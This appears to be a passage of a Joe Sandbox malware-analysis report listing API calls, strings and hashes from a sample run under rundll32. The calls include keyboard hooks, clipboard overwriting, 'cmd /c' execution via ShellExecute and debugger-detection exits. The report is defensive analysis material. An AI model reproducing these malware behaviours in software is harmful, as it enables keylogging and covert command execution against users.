                      • Part of subcall function 04EB8827: _strcpy_s.LIBCMT ref: 04EB891B
                      • Part of subcall function 04EB8827: __invoke_watson.LIBCMT ref: 04EB8930
                      • Part of subcall function 04EB8827: _free.LIBCMT ref: 04EB893F
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                    • String ID:
                    • API String ID: 1828324828-0
                    • Opcode ID: a8b66ca4c2130e10ed575355408ed1c874ee55d2bc5852eb7997c2241a12600a
                    • Instruction ID: 63320322ddd0be77addd1a5a71a9e501d9edb2c01247b63d1d68011f07a57658
                    • Opcode Fuzzy Hash: a8b66ca4c2130e10ed575355408ed1c874ee55d2bc5852eb7997c2241a12600a
                    • Instruction Fuzzy Hash: FFE08C30480729E6EB32BFA1E9015CEB2A5FB44B6AFA0B296A4D411284CA343601CFD1
                    APIs
                    • GetLastError.KERNEL32(00000000,00000000,6D051F9D,6D062DA2,?,6D060E86,00000001,00000364,00000006,000000FF,6D04DDAB,CE3BFFFF,?,6D04EC1A,6D04FC59,FF85FFFF), ref: 6D060D96
                    • SetLastError.KERNEL32(00000000,?,6D04FC59,?,?,?,?,?,00000000,6D04DDAB,?,6CFF2140,?,00000000,?,?), ref: 6D060E38
                      • Part of subcall function 6D0632E5: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,6D04EA46,?,?,6D04FC59,?,?,?,?,?,00000000,6D04DDAB,?,6CFF2140,?,00000000), ref: 6D06330F
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$DisablePrintScreen@@
                    • String ID:
                    • API String ID: 1695489132-0
                    • Opcode ID: 5e70313f9a769b8c280a7170aa0f4713a6fbe069feebe0da2f06399c9076d9bb
                    • Instruction ID: 1865adb1176ba33091da317c46872f2f795a308d5cbe5c630b56750447a1d98e
                    • Opcode Fuzzy Hash: 5e70313f9a769b8c280a7170aa0f4713a6fbe069feebe0da2f06399c9076d9bb
                    • Instruction Fuzzy Hash: 5111E57169C2A2AEFB015BB69C84F6B3ABCEB0B7EDF550224F615930A1DB508D15C1B0
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 241c2b07c6cdee40895c39adfae2dac11d68b88af2225cf85628e54cae2e4159
                    • Instruction ID: 58f43349ff5c6f90ef6953d87b49c17c1d5ca3a7c95e717ab99da7aa3db84634
                    • Opcode Fuzzy Hash: 241c2b07c6cdee40895c39adfae2dac11d68b88af2225cf85628e54cae2e4159
                    • Instruction Fuzzy Hash: D711C2733046425E9724DA7EEA8486BB7DADFD0265700883EE56AC3600FE30F4028AA0
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: __wsopen_s
                    • String ID:
                    • API String ID: 3347428461-0
                    • Opcode ID: a04d827a40ee0ca4d3a42c6c3a369fa2d608df717d1916e85461e9c55eda88bb
                    • Instruction ID: dc31171bd152155aa2c1aeeb3e12515d89c7b656312b3eb6edbe27f33b729a53
                    • Opcode Fuzzy Hash: a04d827a40ee0ca4d3a42c6c3a369fa2d608df717d1916e85461e9c55eda88bb
                    • Instruction Fuzzy Hash: B2113A71A0824AAFDF05CF58E941E9F7BF8EF49314F154059F808EB241D671EA11CBA5
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dc28820d09ff4e456fcc1891384118c2664e2960cbbae8c92fdf4e75a75e1046
                    • Instruction ID: f96b63c4eae53da889ed5d6626972a9f6bd6a65c67b13abce6d3465de7957afb
                    • Opcode Fuzzy Hash: dc28820d09ff4e456fcc1891384118c2664e2960cbbae8c92fdf4e75a75e1046
                    • Instruction Fuzzy Hash: C80180372142569BBF168F69EC51B9A33BAFBCB2207294124FA11AB184DB31940587A0
                    APIs
                    • LoadLibraryA.KERNEL32(0000C087,?,?,?,00000000,04EFE0C7,?,?,?,?,?), ref: 04EFE160
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EFE000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EFE000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4efe000_rundll32.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
                    • Instruction ID: 66d16d330c33771257b4b4d64ffe585a9cb172076f5ebad54ce4803f3f32eb7e
                    • Opcode Fuzzy Hash: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
                    • Instruction Fuzzy Hash: EFF0F4727043168FEB108E5ECC405B777E8AF8166970A1628EA46D7221F321F80183A0
                    APIs
                      • Part of subcall function 6D05F83C: HeapAlloc.KERNEL32(00000000,6D06717F,?,?,6D06717F,00000220,?,?,?), ref: 6D05F86E
                    • RtlReAllocateHeap.NTDLL(00000000,?,?), ref: 6D06461B
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Heap$AllocAllocate
                    • String ID:
                    • API String ID: 2177240990-0
                    • Opcode ID: af69c94a9acc40e4bbd06cd14d0b7be20b82dd9fb0624d7c1da3493a01baba89
                    • Instruction ID: d4a565eb440f0b9d576b61087b9f5a07d5969f4157373494c1fb748c5f2b136e
                    • Opcode Fuzzy Hash: af69c94a9acc40e4bbd06cd14d0b7be20b82dd9fb0624d7c1da3493a01baba89
                    • Instruction Fuzzy Hash: 47F0C83255C19676FB122A2A9C10B6F3BACAF87770B114025E91497192FF20C5108972
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: closesocket
                    • String ID:
                    • API String ID: 2781271927-0
                    • Opcode ID: d537b565484183bbc8d20f7cf844b9537981746cf536033dbc3ee37227d885f9
                    • Instruction ID: 78cbb36f2a32bc4d47101ac75340d1b2b483e5030723fcaba4d561229f2f77c1
                    • Opcode Fuzzy Hash: d537b565484183bbc8d20f7cf844b9537981746cf536033dbc3ee37227d885f9
                    • Instruction Fuzzy Hash: 99F0F632611322ABDB109E95DCC4BEB7BECEFC6616F04042DFA2096160C7719549DBE2
                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,?,CE3BFFFF,?,6D060E86,00000001,00000364,00000006,000000FF,6D04DDAB,CE3BFFFF,?,6D04EC1A,6D04FC59,FF85FFFF,CE3BFFFF), ref: 6D062D91
                      • Part of subcall function 6D05C2C0: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,?,?,6D062D83,?,?,6D060E86,00000001,00000364,00000006,000000FF,6D04DDAB,CE3BFFFF,?,6D04EC1A,6D04FC59), ref: 6D05C2D6
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: AllocateDisableHeapPrintScreen@@
                    • String ID:
                    • API String ID: 3987890349-0
                    • Opcode ID: d5a0d90095e060453af0a94d931a98bdde57f86d2ed22aaf396a9d95d10b7dfe
                    • Instruction ID: 17849ecf5b2b1a22fb4713300dc26877748a97e34f3f37f3a474d298c55a9f0a
                    • Opcode Fuzzy Hash: d5a0d90095e060453af0a94d931a98bdde57f86d2ed22aaf396a9d95d10b7dfe
                    • Instruction Fuzzy Hash: 2EF08932E4A6AA67FB325B76CD04B6F37A8AF437B0B118111BC18EB194CB30D40086F1
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: __flsbuf
                    • String ID:
                    • API String ID: 2056685748-0
                    • Opcode ID: 0ace5904dfc02d4745602e3491f4651976e9a0525a68314e9878bfb92eec9a14
                    • Instruction ID: 25a954d4651688747871a029879930463e2ce9dc95c60bfc398d0d8bac27bb56
                    • Opcode Fuzzy Hash: 0ace5904dfc02d4745602e3491f4651976e9a0525a68314e9878bfb92eec9a14
                    • Instruction Fuzzy Hash: 30E01A300046409EDB264F20D945AB27BB89F4172DF349A8ED6D48D0E3D73AA086DAA0
                    APIs
                    • CreateFileW.KERNEL32(00000000,00000000,?,6D05AA71,?,?,00000000,?,6D05AA71,00000000,0000000C), ref: 6D05A686
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 6e7131211e175cf81b367d97bf3e899df25281ca5603ad53f74f81aea2589f51
                    • Instruction ID: 4c8e91b562b990f94a8a61492fbaf6375bce25ce7dfdf17377516753e325e222
                    • Opcode Fuzzy Hash: 6e7131211e175cf81b367d97bf3e899df25281ca5603ad53f74f81aea2589f51
                    • Instruction Fuzzy Hash: 8CD06C3200010DBBDF028F85DC06EDA3BBAFB4C714F118100FA1866020C732E822AB90
                    APIs
                    • DisableThreadLibraryCalls.KERNEL32(?,?,?,04EB3EBC,?,?,?,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EC806E
                      • Part of subcall function 04EC48A0: OutputDebugStringA.KERNEL32(Blocked,?,?), ref: 04EC48D7
                      • Part of subcall function 04EC48A0: ExitProcess.KERNEL32 ref: 04EC48DF
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: CallsDebugDisableExitLibraryOutputProcessStringThread
                    • String ID:
                    • API String ID: 825726465-0
                    • Opcode ID: 3e2b2a1e891103abe1f8fa331121c00d9cba745733aa6da561a50588cfc6108c
                    • Instruction ID: b99b9e602162165346c44cba46700337655f79d887236f687bc77a7a5548ce76
                    • Opcode Fuzzy Hash: 3e2b2a1e891103abe1f8fa331121c00d9cba745733aa6da561a50588cfc6108c
                    • Instruction Fuzzy Hash: D5D0123202162897DB10BF4DE541ECD37ECEB59755F004016F9149B300C6B8BD9287E9
                    APIs
                    • ioctlsocket.WS2_32(00000024,8004667E,00000000), ref: 6D03EFBB
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ioctlsocket
                    • String ID:
                    • API String ID: 3577187118-0
                    • Opcode ID: 15d5e3b5b0027c972ccf06152b59d1a318f4205e325e5fba303d377da3548512
                    • Instruction ID: 8df8922d37ffa997da6f172f855709eef859ac68e8a74f22de204af053635997
                    • Opcode Fuzzy Hash: 15d5e3b5b0027c972ccf06152b59d1a318f4205e325e5fba303d377da3548512
                    • Instruction Fuzzy Hash: 2EC00272908216FFCB019F71C94489ABBF9EB85256F11C97EB189E1030EB3199A4DB06
                    APIs
                    • HeapCreate.KERNEL32(00000000,00001000,00000000,000000FF,?,04EBB0DF,00000011,00000000,?,04EB48E3,0000000D,04ECC5A0,00000008,04EB49DA,00000000), ref: 04EB792E
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: CreateHeap
                    • String ID:
                    • API String ID: 10892065-0
                    • Opcode ID: d7325cc01062168cb057db27aa5b50fea2c19dc7e7ba60b77806f293e99aff93
                    • Instruction ID: ccc0d31042e57aecdc77c40b33eb17e680bac136c582405c564641c48a98a40f
                    • Opcode Fuzzy Hash: d7325cc01062168cb057db27aa5b50fea2c19dc7e7ba60b77806f293e99aff93
                    • Instruction Fuzzy Hash: 12C092B07813025BE7584B3AAC5BB8A2598DB48B43F220139B217D95C9DAB498A0AA04
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: DebuggerExitPresentProcess
                    • String ID:
                    • API String ID: 1812251604-0
                    • Opcode ID: 79804c6342d124a201a0860bf1b5505f80c45f91b98b1881cc9498dbb9c1e44a
                    • Instruction ID: 665f8bd7d7c2cd6ebc72385b672babedd1500d75a000f8abb1c8cc1b44891f76
                    • Opcode Fuzzy Hash: 79804c6342d124a201a0860bf1b5505f80c45f91b98b1881cc9498dbb9c1e44a
                    • Instruction Fuzzy Hash:
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: _strncpy
                    • String ID: CALG_3DES$CALG_3DES_112$CALG_AES$CALG_AES_128$CALG_AES_192$CALG_AES_256$CALG_AGREEDKEY_ANY$CALG_CYLINK_MEK$CALG_DES$CALG_DESX$CALG_DH_EPHEM$CALG_DH_SF$CALG_DSS_SIGN$CALG_ECDH$CALG_ECDH_EPHEM$CALG_ECDSA$CALG_ECMQV$CALG_HASH_REPLACE_OWF$CALG_HMAC$CALG_HUGHES_MD5$CALG_MAC$CALG_MD2$CALG_MD4$CALG_MD5$CALG_NO_SIGN$CALG_PCT1_MASTER$CALG_RC2$CALG_RC4$CALG_RC5$CALG_RSA_KEYX$CALG_RSA_SIGN$CALG_SCHANNEL_ENC_KEY$CALG_SCHANNEL_MAC_KEY$CALG_SCHANNEL_MASTER_HASH$CALG_SEAL$CALG_SHA$CALG_SHA1$CALG_SHA_256$CALG_SHA_384$CALG_SHA_512$CALG_SKIPJACK$CALG_SSL2_MASTER$CALG_SSL3_MASTER$CALG_SSL3_SHAMD5$CALG_TEK$CALG_TLS1PRF$CALG_TLS1_MASTER
                    • API String ID: 2961919466-3550120021
                    • Opcode ID: a828147581fd2fd31ae2c141c9856674f5999ef24dde568a32307e65fc89f0da
                    • Instruction ID: 9330f695dfa2a7910d061bd8fe0ca1ca507e5fb01c7d624fd6a548e42130f08f
                    • Opcode Fuzzy Hash: a828147581fd2fd31ae2c141c9856674f5999ef24dde568a32307e65fc89f0da
                    • Instruction Fuzzy Hash: 4592F75661C1C24AF3455A789CE27BB7FE36FD625CBC848A9C8C6CF252E607C54CC262
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: Expire Date: %s$ Issuer: %s$ Public Key Algorithm: %s$ Serial Number: %s$ Signature Algorithm: %s$ Signature: %s$ Start Date: %s$ Version: %lu (0x%lx)$ GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s$%2d Subject: %s$%lx$%s%x$%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$-----BEGIN CERTIFICATE-----$-----END CERTIFICATE-----$0$Cert$Expire Date$FALSE$GMT$Issuer$Public Key Algorithm$Serial Number$Signature$Signature Algorithm$Start Date$Subject$TRUE$Version
                    • API String ID: 0-2545231491
                    • Opcode ID: efc72967e6069bb8767b04357dca384f8badf1a9d3ab7882d6a2c44f24d82036
                    • Instruction ID: debf0bca6ff1cccc0726c2e8bd2b11d4982686813aeba066ecfcc2bac6ccdf77
                    • Opcode Fuzzy Hash: efc72967e6069bb8767b04357dca384f8badf1a9d3ab7882d6a2c44f24d82036
                    • Instruction Fuzzy Hash: A2D29A7190C292DFF7264A358850FBF7BE9AFD6304F04C53DE986AB242D6319905C7A2
                    APIs
                    • _strncpy.LIBCMT ref: 6D02826C
                    • ?UnInstallKBHook@@YAHXZ.HKEYBOARD(?,00000000,00000401,?,?,?,?,?,?,?), ref: 6D028337
                    • getsockname.WS2_32(?,?), ref: 6D0283A7
                    • WSAGetLastError.WS2_32(?,00000100), ref: 6D0283BE
                    • WSAGetLastError.WS2_32 ref: 6D0284A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$Hook@@Install_strncpygetsockname
                    • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                    • API String ID: 927759634-3876000827
                    • Opcode ID: 8149926bca53bc68ac57e45dfe7197b33b2148ab0b061171f573af7237930691
                    • Instruction ID: 950a0f61998c53bffd1c5cc750009ccb5364adb0999cf82ac7b6dfc50d1c14cb
                    • Opcode Fuzzy Hash: 8149926bca53bc68ac57e45dfe7197b33b2148ab0b061171f573af7237930691
                    • Instruction Fuzzy Hash: 6E12F075909352AFF710DF248C44FBB77E8BB4A308F44492DFA8897242E775D90987A2
                    APIs
                    • GetTickCount.KERNEL32 ref: 04EC6B25
                    • _memset.LIBCMT ref: 04EC6CD2
                    • wsprintfA.USER32 ref: 04EC6CE9
                    • ShellExecuteA.SHELL32(00000000,open,cmd,?,00000000,00000000), ref: 04EC6D0A
                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 04EC6D5E
                    • Sleep.KERNEL32(000003E8), ref: 04EC6DB5
                    • OpenClipboard.USER32(00000000), ref: 04EC6E2A
                    • EmptyClipboard.USER32 ref: 04EC6E34
                    • GlobalAlloc.KERNEL32(00002000,00000001), ref: 04EC6E41
                    • GlobalLock.KERNEL32(00000000), ref: 04EC6E4B
                    • GlobalUnlock.KERNEL32(00000000), ref: 04EC6E5E
                    • SetClipboardData.USER32(00000001,00000000), ref: 04EC6E67
                    • CloseClipboard.USER32 ref: 04EC6E6D
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Clipboard$Global$ExecuteShell$AllocCloseCountDataEmptyLockOpenSleepTickUnlock_memsetwsprintf
                    • String ID: /c %s$CopyC$Enable$False$Remark$cmd$open${CA170F4C-9C78-46c4-9018-2BAD1F52C16F}
                    • API String ID: 195233984-3851707614
                    • Opcode ID: 5c5d7a99af92d6fc9e45c33202e97ac550bcf2a4e07f3980300e4032b68dbca2
                    • Instruction ID: e247c8d654b37d44932931d199d5335914be0549d72ad4cd2ea3fb4f617d8020
                    • Opcode Fuzzy Hash: 5c5d7a99af92d6fc9e45c33202e97ac550bcf2a4e07f3980300e4032b68dbca2
                    • Instruction Fuzzy Hash: 64911E727042005BD220AB69FC46BDFB794EFC5325F00557EEA8A8B241C9357907C7E2
                    APIs
                    • ?UnInstallKBHook@@YAHXZ.HKEYBOARD(?,?,?,?,?,00000100,?,?,?,?,?,?,?,?,?,00000000), ref: 6D0368A0
                    • htons.WS2_32(?), ref: 6D036997
                    • bind.WS2_32(?,?,00000010), ref: 6D036B2E
                    • htons.WS2_32(?), ref: 6D036B6F
                    Strings
                    • getsockname() failed with errno %d: %s, xrefs: 6D036BE4
                    • Local port: %hu, xrefs: 6D036C35
                    • Couldn't bind to interface '%s', xrefs: 6D0369D1
                    • Local Interface %s is ip %s using address family %i, xrefs: 6D03693E
                    • bind failed with errno %d: %s, xrefs: 6D036C1C
                    • Name '%s' family %i resolved to '%s' family %i, xrefs: 6D036A5C
                    • Couldn't bind to '%s', xrefs: 6D036AD2
                    • Bind to local port %hu failed, trying next, xrefs: 6D036B60
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
